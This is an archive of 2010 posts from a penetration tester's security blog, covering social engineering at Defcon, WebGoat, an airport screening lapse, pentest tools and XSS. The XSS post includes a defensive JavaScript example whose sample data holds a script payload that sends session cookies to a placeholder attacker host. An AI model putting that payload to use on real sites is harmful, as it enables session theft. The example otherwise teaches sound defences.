Enabling Secure Business Operations


Add Social Engineering to Your Company’s Security Awareness Training Or Get Pwned at Defcon

August 3rd, 2010

This past week at Defcon the social engineering capture the flag competition was hotter and more controversial than ever. Contestants were given their target company two weeks in advance for research purposes. During the actual competition contestants called employees at the target companies to gain sensitive information. The overall result: A big fat fail for the human element.

As more companies begin to take security seriously, budgeting for pen tests, equipment, etc., the human element of security often falls through the cracks. As shown at the Defcon competition, all the locks, both physical and network based, can’t stop an attacker if an employee ushers her through the door.

The Social Engineering Competition was put on by Social-Engineer.org which is an excellent place to learn more about social engineering. Don’t let a lack of employee awareness of social engineering attack vectors undermine your security program.

How to write code that doesn’t suck

July 15th, 2010

Web application hacking is big business. Even the traditionalist network penetration testers are crossing over to the new security rock and roll scene. The average individual doesn’t know what DNS does, and if I said, “I knocked over the internet by attacking BGP,” at a cocktail party, guests would probably suspect I just said something vulgar. On the other hand, “You are a hacker? Can you get credit card numbers off websites?” is a common reaction from even the computer unsavvy. My answer, “Yes, most websites suck.”

So how do you make your websites not suck? My colleague recently posted about OWASP’s ESAPI. Additionally, OWASP developed Webgoat, arguably the go-to training tool for web application hacking n00bs to cut their teeth. On top of giving hackers a chance to bring down websites in more than a dozen ways, several Webgoat lessons include a lab section. These labs include not only hacking the website, but also delving into the code to find the flaw that causes the vulnerability, fixing it, and testing the attack again. Getting down and dirty with the actual code is instructive for penetration testers and coders alike.

Webgoat labs should be mandatory for all website coders. Please start writing code that doesn’t suck so the web application hackers will stop getting so much attention and people will start paying attention to my mediocre attempts at hacking the infrastructure. Let’s call it the “Georgia for infosec prom queen” project shall we?

Hacking the TSA: No Tutorial Required

June 8th, 2010

I’m fairly certain I unwittingly committed a serious crime. I went through airport security using someone else’s boarding pass, bearing a name that only resembled my own completely legitimate and self-representative government-issued ID in that our last names shared the same first letter. The TSA agent, you know the one, with the little hologram-checking flashlight, looked at my ID, my boarding pass, my ID again, me. I thought he seemed a tad skeptical, taking longer than necessary on a process he must step through about a million times a day. I will admit that passport photograph was taken when I was 16, and I can look a little like a fraud at 7 am after several nights of limited sleep. Rather than being annoyed at the slight holdup, though said lack of sleep had me about at the end of my rope with the usual ubiquitous airport annoyances, I realized this man was only doing his job to protect my safety. I can certainly hang around an extra 30 seconds so I don’t get blown to bits. Then he marked a bunch of esoteric jargon on the boarding pass I was not yet aware was not mine and sent me on through security. Who needs Bruce Schneier’s boarding pass switching trick when you can make it through security with just any old boarding pass that you find lying around the airport?

I thought there might be a snafu in the whole thing once I realized the flight I was waiting for was not my own and examined the boarding pass realizing Mr. W____/S____ was not in fact me. The problem I anticipated was the lack of said marks on my boarding pass. However, this was not the case, and I boarded my correct flight without incident.

How did I end up with someone else’s boarding pass? By what strange luck did I happen to have my own boarding pass waiting in the bottom of my backpack to save the day, no doubt saving me from a lot of awkward questions, possible detainment, and at the very least missing my flight by having to go back out through security to get the whole mess sorted out? As it happens, I took advantage of the online check-in and boarding pass printing option the evening before the flight. I decided to check my bag (mainly because I didn’t feel like lugging around my mammoth CISSP book in not one but two airports). So I had to wait in line at the kiosks anyhow. I did not instruct the kiosk to print out another copy of my boarding pass; however, before taking off towards security, I noticed a boarding pass in the kiosk. Not one to leave personal information lying around, I grabbed the pass, assuming the kiosk was living up to kiosks’ generally unreliable reputation. Now that I had two copies of my boarding pass, why wouldn’t I opt to use the thick, newly printed one rather than the day-old, wrinkly one cluttered with weather and restaurant information? I should have inspected the boarding pass for accuracy; I humbly admit this. I’m sure kiosks spit out the wrong boarding passes on occasion, and even more often dazed and overwhelmed individuals leave their boarding passes behind. In my defense it was quite early, I suffer from severe flight anxiety that only massive doses of Xanax can assuage, and I did after all have another boarding pass on hand that I had carefully inspected for accuracy.

I did not attempt to board the other individual’s flight, but I did feel somewhat concerned for my safety. I won’t go into the specifics of ideas that came to mind for how black hats and terrorists might leverage this lack of constant vigilance on the part of TSA employees. I have enough trouble flying with fears of mechanical failure and turbulence. So please Washington Dulles International Airport and any other airports with this problem, step it up. Our safety is on the line.

Not to mention I had my lock picks in my bag by mistake and no one noticed.

To Buy Shiny New Products Or Not To Buy

May 20th, 2010

I got a chance to see the Metasploit Express beta in action last week at NoVa Hackers. I was planning on writing about my impressions, but there is plenty out there from people who have spent a good deal more time in front of the beta than I have. Instead, I’m going to delve into pertinent questions a company should ask itself to see if Metasploit Express fits into the security program.

I am a fan of Core Impact, not only because they let me into their party at Blackhat Las Vegas last year. They make a good product. However, a common scenario I have seen in my experience as a security consultant is companies just purchasing flashy products without thinking about how these products will integrate into the security program. The Core Impact sales team comes in with their vulnerable machines and does the point-and-click to root. Then, the general consensus is “We’ve got to get that. It’s shiny!” The problem is that when Core Impact shows up on the corporate network it doesn’t get any shells. Why? Because the customer ends up using Core Impact as little more than a check on patch management, which they already have under control. If a strong patch management system is already in place on the network, the default network scan from Core Impact will yield very little.

Metasploit Express builds off a very powerful open source tool with a wide variety of capabilities. It is quite possible that the product will be able to fill a gap in your security program. However, without researching your company’s needs, risks, and what Metasploit Express can do to meet them, you won’t get the most out of Metasploit Express. Sleek interfaces and support from Rapid7 cannot make up for a lack of understanding of your particular security needs.

On the whole, I’m glad to see Metasploit potentially reach a wider corporate audience with Metasploit Express. It seems in many cases Metasploit in its current form is considered a hack tool and passed over for products such as Core Impact that have a company backing and a hefty price tag. So long as I can still use community supported Metasploit for my everyday vulnerability research, I’m happy to see Metasploit get the piece of corporate pie it has long since earned.

Back to Basics: No Tech Hacking at 30,000 feet

May 4th, 2010

Sometimes I travel for work. Sometimes I travel for pleasure. Sometimes when I travel for pleasure I bring my work along so as to maximize the number of days a year I can spend traveling for pleasure. How about you?

Recently I was on a plane, and it came to my attention that the computer screen directly in my line of sight had all the telltale signs of doing work. Was this passenger aware that I, as well as several other passengers, could see what had all the looks of stuff that should be shredded before heading to the dumpster? Translation: little ol’ me, bored with the onboard entertainment, should not be able to see this information.

The thing that really got my attention and caused me to write this little note was when the passenger in question got up to go to the lavatory. On the surface this seemed like an OK thing to do. The fasten seatbelt sign was off. People are generally trustworthy enough that if some would-be cybercriminal swiped the passenger’s laptop, many witnesses would come forward and the laptop would be recovered. The problem was that the passenger’s screen was still visible. Did the passenger even know the individual sitting in the next seat? Doesn’t the passenger’s company have a security policy, complete with compliance training and certification, that strictly prevents this sort of behavior?

In short, be vigilant. Being out of the office doesn’t make you safe; threats to company security are everywhere, even at 30,000 feet. With smaller cameras with better zoom coming every day, it’s fair to say that anything on your screen may be readable to anyone with a view of your screen. Be aware of your surroundings and use caution when accessing work-related resources in public.

XSS is Alive and Well

April 19th, 2010

First off, I would like to commend Apache for their detailed, well written disclosures of security breaches. Some organizations keep such incidents quiet even within the organization, sometimes going so far as immediately reimaging machines that have potentially been compromised without performing any forensic analysis to see what attacks were successful and whether any sensitive information was compromised. In the spirit of full disclosure, Apache not only goes through the steps of analyzing exactly what happened, but also shares this information with the public.

Many companies, as well as vulnerability researchers, believe that Cross Site Scripting (XSS) vulnerabilities are all benign; the worst that will possibly happen to your site is an alert window announcing “Georgia is l33t!” However, part of the recent attack on Apache, which resulted in root compromises of machines within Apache, was the exploitation of XSS vulnerabilities. The incident report reads like something out of The Web Application Hacker’s Handbook. The attack used a bug reporting web forum that was vulnerable to XSS. When a user clicked on the link included in the bug report, an XSS attack grabbed the user’s session cookie. Given that the post was related to a potential bug in Apache software, it isn’t hard to imagine why an unsuspecting administrator might click the link.

This incident just goes to show that even an organization with a strong security posture can fall victim to the dangers of XSS attacks. Code review and penetration testing of web applications should be in place to assess the risk of malicious XSS attacks compromising your company’s assets. XSS vulnerabilities should be taken just as seriously as more hyped web application vulnerabilities.
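The two controls that break the cookie-theft chain described above, as an added example (not code from the original post, and not Apache's own code): HTML-encoding untrusted bug-report fields before they reach the page, and issuing the session cookie with HttpOnly so script cannot read it. The report content, cookie name and values are constructed sample data.

```javascript
// Vulnerable: report fields are concatenated straight into the markup, so a
// <script> tag or a javascript: link in a "bug report" runs in every reader's
// browser with the reader's session.
function renderReportVulnerable(report) {
  return `<div class="report"><h2>${report.title}</h2>` +
         `<p>${report.body}</p><a href="${report.link}">details</a></div>`;
}

// HTML-encode the characters that can change context inside element content
// and inside double- or single-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Only allow http(s) links; anything else (javascript:, data:, relative junk)
// is replaced with an inert anchor. Uses the WHATWG URL parser built into Node.
function safeHref(url) {
  try {
    const u = new URL(String(url));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? String(url) : '#';
  } catch (_) {
    return '#';
  }
}

// Hardened: every untrusted field is encoded for the context it lands in.
function renderReportSafe(report) {
  return `<div class="report"><h2>${escapeHtml(report.title)}</h2>` +
         `<p>${escapeHtml(report.body)}</p>` +
         `<a href="${escapeHtml(safeHref(report.link))}">details</a></div>`;
}

// Set-Cookie value for the session: HttpOnly keeps document.cookie from reading
// it even if an XSS slips through, SameSite and Secure limit where it is sent.
// "sessionid" is an assumed cookie name, not the tracker's real one.
function sessionCookieHeader(sessionId, secure = true) {
  const parts = [`sessionid=${sessionId}`, 'Path=/', 'HttpOnly', 'SameSite=Lax'];
  if (secure) parts.push('Secure');
  return parts.join('; ');
}

// Constructed sample report: the kind of submission the post describes.
const sampleReport = {
  title: 'Crash on startup',
  body: 'Steps to reproduce: <script>fetch("https://attacker.invalid/?c="+document.cookie)</script>',
  link: 'javascript:alert(document.cookie)',
};

module.exports = { renderReportVulnerable, renderReportSafe, escapeHtml, safeHref, sessionCookieHeader, sampleReport };
```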

Using Dradis to Organize and Share Information with Your Team

April 1st, 2010

Probably one of the first things you find out when you transition from “This is fun. Let’s learn some stuff about ethical hacking,” to breaking into doing it professionally is that it’s imperative to keep track of everything. Clients are going to want a little more information than “Oh look I broke in! I’m so cool!” They are going to want an in-depth report (a whole new skill to learn). Thus keeping records of what you did as you do it becomes a vital part of the job. Additionally, whether working on a pentest, playing red at a cyber defense competition, or pretty much any other large project, chances are you will find yourself working on a team. In school after working on team based projects, “Communication among team members is vital to the success of the project,” was always at the top of my list of lessons learned. That’s where the Dradis Framework comes in to play.

The Dradis Framework is an open source tool aimed at penetration testers, developed in Ruby. As stated in a previous post, Dradis is all set up and ready to go on Backtrack 4, though the Dradis team recently released a new version with some exciting new features, so if you haven’t already, it might be time to set up persistent changes on your pentest box and upgrade. If you aren’t using Backtrack 4, do not despair. Dradis runs on several versions of Linux, Windows, and Mac. Additionally, the Dradis team provides excellent support for getting the framework set up. With a few prerequisites, you’ll be ready to get started conducting well organized pentests.

Dradis allows you to easily import the results from common tools such as nmap and Nessus. The newest version has added plugins for importing results from the Burp scanner and Nikto. Another useful feature is the ability to add notes to any node with comments for the rest of your team like, “I tried Metasploit module X against this, but no cigar.” This helps to cut down on overlap among team members if everyone notes what they’ve done, and what they think looks interesting but haven’t gotten around to fully exploring.

I have found Dradis to be especially useful playing red team during cyber defense exercises. It’s a fast-paced, high-stress scenario, often with multiple target networks that you need to hit as equally as possible. Also, the team is often made up of people you aren’t used to working with, so the rapport built through working together every day isn’t there. A centralized place where everyone can see what has been done, and what still needs to be done, again reduces overlap and wasted time. So if organizing your pentests is getting you down, Dradis might just be the solution you’ve been looking for.

Resources for Learning to Pentest

March 17th, 2010

So you think penetration testing might be a fun and valuable skill to pick up. You read some books on the subject and spend a good few evenings poring over the man pages of some common tools; what now? Chances are you set up a couple of unpatched or otherwise vulnerable machines and test out your skills. Next thing you know, Metasploit has a system shell. Are you a pentester now? Chances are the experience left you somewhat unsatisfied; you did, after all, know the vulnerabilities ahead of time. To be a real pentester, you will have to start from scratch with little or no knowledge of the network at hand. So what now?

No doubt there are plenty of vulnerable boxes out there on the internet just waiting to be pillaged, but jail time doesn’t exactly seem like the best way to start a career. My colleague Tim recently posted about vulnerable WebApp scenarios that are definitely worth checking out. I’d like to point you in the direction of some additional resources at heorot.net. The de-ice penetration testing livecds are ideal for taking that next step in your penetration testing training. Multiple levels are provided as you progress, and hints are provided if you get stuck. Here again, you know these hosts are vulnerable, but you certainly don’t know how. To successfully complete them, you will need to develop critical thinking skills as well as master the tools of the trade. These livecds also come prepackaged with Thomas Wilhelm’s book Professional Penetration Testing, available from Syngress, which I would also recommend picking up to aid your study of the exciting world of pentesting.

Backtrack 4: The big cheese

January 22nd, 2010

It’s the news penetration testers have all been long awaiting; Backtrack 4 final is here and now. Though many people, myself included, have been using various pre-release, beta release, and pre-final release flavors for almost a year now, ever since first standing in line to hand over my USB stick to a group of elite hackers at Shmoocon 5, now there is no excuse. The final release is just in time for Hack or Halo at Shmoocon 6, saving me the trouble of making sure to update every tool I might possibly need before the big event.

So why does Backtrack rock in general? It’s basically most of the tools you will need for your pentest all rolled into one and set up nicely. I say most because it doesn’t have your commercial tools such as Nessus built in, for obvious reasons, though it is possible to integrate your licensed Nessus into your Backtrack install. Ever been setting up Dradis for your first big pentesting gig at a new company on a recently imaged box? You’ve got your ruby prerequisites (rubydev, opensslruby, etc.), various gardening tools, SQLite, diamonds, garnets, and opals. At some point in the process of getting it all integrated, even a technically savvy individual may find himself ruing the day he decided it was a good idea to wait until the night before to build the pentest box. In Backtrack it goes like this:
root@bt4: cd /pentest/misc/dradis/server
root@bt4: ruby ./script/server
Done.

So why upgrade to Backtrack 4? First off, there’s the obvious perk of having the newest versions of all your favorite tools and some you’ve had on your list to check out for a while now. It also includes some new tools that have been developed in the interim since Backtrack 3 came out way back in summer of 2008, saving you the trouble of those pesky installs and SVN checkouts. A great new tool that’s making its Backtrack debut on the final release of Backtrack 4 is ReL1K’s social engineering toolkit (SET). Additionally, Backtrack 4 is Ubuntu based rather than Slackware based. While Backtrack 3 was great, an Ubuntu-based system has its perks as far as driver integration goes. As more and more people move from just the Live-CD Backtrack approach to using Backtrack as the base operating system on their pentesting boxes, this can only be a step in the right direction. Speaking of installation, Backtrack 4 final has an installation script that looks a lot like the GUI-based point-and-click installation wizards seen in systems such as Ubuntu, resulting in a more hands-off approach than persistent changes in Backtrack 3.

The only drawback with Backtrack 4 that I can think of would be trying to write up your reports in Backtrack. Let’s not get into any holy war between writing in vi or nano, and just suffice it to say it’s not easy. Backtrack 4 does come with Emacs, and some included tools such as Maltego make some pretty graphs. Plus, you can install OpenOffice on Backtrack, so it’s not that big of a drawback after all.
All in all, Backtrack 4 is the bomb, and if you haven’t jumped on the bandwagon, my advice is to get to it.

Georgia

Nexus One: A New Grail for the Littlest Hack Station?

January 8th, 2010

It’s all over the news; Google finally has an Android to call its own. The media is throwing around terms such as iPhone killer, but that doesn’t seem altogether likely to me. Perhaps it will level out to a PC vs. Mac sort of scenario. This actually sounds plausible as in my research I came across news of a project working on porting Mac OSX 7 to the iPhone, and the great big thing with Android back when I got mine was running Debian on the G1.
